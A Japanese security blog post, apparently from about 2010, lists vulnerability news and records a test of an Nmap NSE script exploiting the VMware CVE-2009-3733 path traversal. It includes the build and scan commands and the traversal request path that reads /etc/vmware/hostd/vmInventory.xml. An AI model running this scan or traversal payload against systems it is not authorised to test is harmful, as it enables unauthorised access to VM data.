- Google Chrome Multiple Vulnerabilities (Secunia)
- Opera TLS Session Renegotiation Plaintext Injection Vulnerability (Secunia)
- Cisco IronPort Multiple Vulnerabilities (Secunia)
- 「GNU Hello 2.5」リリース make dist のセキュリティホールを修正: CodeZine
- VM Stealing: The Nmap way (CVE-2009-3733 exploit) (SkullSecurity)
SecurityFocus の Exploit も NSE な時代になりました。ポスト NASL 最有力候補です。CentOS にてテストしてみます。
sudo yum -y install gcc gcc-c++ openssl-devel wget "http://nmap.org/dist/nmap-5.21.tar.bz2" tar jxf nmap-5.21.tar.bz2 cd nmap-5.21/ ./configure --prefix=/usr/local/nmap-5.21 make sudo make install wget "http://www.skullsecurity.org/blogdata/http-vmware-path-vuln.nse" /usr/local/nmap-5.21/bin/nmap -n -PN -sV --script=./http-vmware-path-vuln.nse --script-trace -p 8222,8333 192.168.0.8
/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E//etc/vmware/hostd/vmInventory.xml を GET するようです。手元に VMware Server 2.0.2 (Not Vulnerable) しかないので結果がつまらにゃい、404 Not Found になります。ちゃんとメンテナンスしているボクはすばらすぃということにしておきましょう。
- Red Hat 社が RHEL 5.5 に KVM メモリバルーニングを搭載へ (virtualization.info)
http-vmware-path-vuln.nse
ニュース